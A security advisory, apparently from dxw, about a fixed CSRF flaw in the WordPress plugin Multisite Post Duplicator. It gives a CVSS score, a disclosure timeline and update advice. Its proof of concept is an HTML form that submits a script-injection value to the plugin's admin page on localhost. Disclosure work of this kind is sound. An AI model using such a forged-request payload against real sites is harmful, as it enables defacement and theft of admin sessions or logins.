CSRF vulnerability in Multisite Post Duplicator could allow an attacker to do almost anything an admin user can do

Vulnerability

Last revised: December 9, 2016

Contains a CSRF vulnerability which can copy content from one site of a multisite installation to another.

This could be used to add arbitrary HTML to the front-end of the site (which could be used for defacement, harvesting login credentials from authenticated users, or could be used to do virtually anything a logged-in admin user can do).

This could also be used to view content not meant to be published.

Current state: Fixed

CVSS Summary

CVSS base scores for this vulnerability
Score	5.8 Medium
Vector	Network
Complexity	Medium
Authentication	None
Confidentiality	Partial
Integrity	Partial
Availability	None

You can read more about CVSS base scores on Wikipedia or in the CVSS specification.

Proof of concept

Some of these values may need adjusting depending on the post IDs, blog IDs, etc.

<form method="POST" action="http://localhost/wp-admin/tools.php?page=mpd">
  <input type="text" name="mpd-post-status" value="draft">
  <input type="text" name="mdp-prefix" value="&lt;script&gt;alert(1)&lt;/script&gt;">
  <input type="text" name="action" value="add_foobar">
  <input type="text" name="el0" value="post">
  <input type="text" name="el1" value="1">
  <input type="text" name="el2" value="1">
  <input type="text" name="el3" value="1">
  <input type="text" name="duplicate-submit" value="Duplicate">
  <input type="submit">
</form>

Advisory timeline

2016-11-01: Discovered
2016-12-07: Tested version 1.1.3 and found the plugin no longer vulnerable to the attack as described
2016-12-09: Advisory published

Mitigation/further actions

Update to version 1.1.3 or later.

dxw advisories

Advisory: